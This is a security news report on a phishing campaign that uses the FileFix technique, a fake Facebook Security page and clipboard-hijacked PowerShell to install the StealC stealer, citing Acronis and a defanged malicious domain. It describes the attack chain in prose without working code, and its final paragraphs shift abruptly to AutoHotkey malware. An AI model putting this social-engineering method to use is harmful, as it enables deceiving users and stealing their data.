Cybersecurity experts have raised an alarm about a new attack campaign that utilizes a variant of the FileFix social engineering technique to distribute the StealC information stealer malware.
“The campaign employs a convincingly designed, multilingual phishing website (such as a fake Facebook Security page) with advanced obfuscation and anti-analysis methods to avoid detection,” shared Acronis security researcher Eliad Kimhy in a report provided to The Hacker News.
The attack process involves the use of FileFix to lure users into executing an initial payload, which then downloads seemingly harmless images containing malicious components from a Bitbucket repository. This strategy allows the attackers to exploit the trust associated with a legitimate source code hosting platform to evade detection.
Initially introduced by security researcher mrd0x as a proof-of-concept (PoC) in June 2025, FileFix differs from ClickFix by eliminating the need for users to interact with the Windows Run dialog and paste an obfuscated command for fake CAPTCHA verifications on phishing pages.
Instead, FileFix manipulates a web browser’s file upload feature to deceive users into copying and pasting a command in the File Explorer’s address bar, leading to its local execution on the victim’s machine.
The attack begins with a phishing site where victims are redirected from an email warning about potential suspension of their Facebook accounts due to policy violations in shared posts or messages. Users are then prompted to appeal the decision by clicking a button.
The phishing page is heavily obfuscated and employs techniques like junk code and fragmentation to impede analysis efforts.
Upon clicking the button, the FileFix attack is triggered, displaying a message to the victim indicating access to a PDF version of the alleged policy violation by pasting a document path in the File Explorer’s address bar.
Although the provided path is harmless, a malicious command is covertly copied to the user’s clipboard when they click the button to open File Explorer. This command is a multi-stage PowerShell script that downloads the image, decodes it into the next-stage payload, and executes a Go-based loader to unpack shellcode responsible for initiating StealC.
FileFix offers a significant advantage over ClickFix by exploiting a commonly used browser feature instead of the Run dialog, which could be blocked by a system administrator for security purposes.
“Unlike ClickFix, FileFix executes the payload through the victim’s web browser, making it more conspicuous in an investigation or to security solutions,” noted Acronis.
“The threat actor behind this attack has invested significantly in crafting the phishing infrastructure, payload delivery, and supporting elements to maximize evasion and impact.”
The script is designed to profile the compromised host and deliver additional payloads, including AnyDesk, TeamViewer, information stealers, and clipper malware.
The cybersecurity firm also identified other variations of the campaign where victims are instructed to run an MSHTA command pointing to a deceptive Google domain (“wl.google-587262[.]com”) that retrieves and executes a remote malicious script.
“AHK is a Windows-based scripting language originally intended for automating tasks like keystrokes and mouse clicks,” mentioned Doppel security researcher Aarsh Jawa.
“While AHK has been popular among power users and system administrators for its simplicity and flexibility, threat actors began weaponizing it around 2019 to create lightweight malware droppers and information stealers disguised as benign automation tools or support utilities.”
